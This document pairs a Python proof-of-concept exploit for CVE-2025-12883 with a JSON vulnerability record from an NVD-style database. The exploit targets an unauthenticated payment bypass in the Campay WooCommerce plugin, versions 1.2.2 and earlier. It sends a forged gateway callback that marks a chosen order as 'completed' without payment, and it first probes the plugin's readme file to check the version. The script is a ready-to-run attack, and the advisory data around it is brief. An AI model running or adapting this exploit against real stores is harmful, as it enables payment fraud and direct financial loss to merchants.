CVE-2025-12883

# CVE-2025-12883 PoC - Campay WooCommerce Payment Bypass # This PoC demonstrates the payment bypass vulnerability import requests import json TARGET_URL = "https://vulnerable-site.com/" ORDER_ID = "1234" # Example order ID def exploit_payment_bypass(): """ Exploit the unauthenticated payment bypass vulnerability in Campay WooCommerce Payment Gateway plugin <= 1.2.2 """ # The plugin fails to validate payment gateway transactions # Attacker can directly mark order as completed without payment # Method 1: Direct callback manipulation callback_url = f"{TARGET_URL}?wc-api=wc_campay_gateway&order={ORDER_ID}&status=completed" try: response = requests.get(callback_url, timeout=10) print(f"[*] Sent payment confirmation request to: {callback_url}") print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: print("[+] Order may have been marked as completed!") except requests.RequestException as e: print(f"[-] Request failed: {e}") def check_vulnerability(): """ Check if target is vulnerable by examining plugin version """ version_url = f"{TARGET_URL}wp-content/plugins/campay-api/readme.txt" try: response = requests.get(version_url, timeout=10) if "1.2.2" in response.text or "1.2.1" in response.text or "1.2.0" in response.text: print("[!] Target appears to be running vulnerable version") return True except: pass return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-12883 - Campay WooCommerce Payment Bypass PoC") print("=" * 60) check_vulnerability() exploit_payment_bypass()

{"cve": {"id": "CVE-2025-12883", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:40.470", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Campay Woocommerce Payment Gateway plugin for WordPress is vulnerable to Unauthenticated Payment Bypass in all versions up to, and including, 1.2.2. This is due to the plugin not properly validating that a transaction has occurred through the payment gateway. This makes it possible for unauthenticated attackers to bypass payments and mark orders as successfully completed resulting in a loss of income."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?old_path=/campay-api/tags/1.2.2&new_path=/campay-api/tags/1.2.3&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/campay-api/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2f12fa00-6108-4bd4-9310-8558211f4d0f?source=cve", "source": "[email protected]"}]}}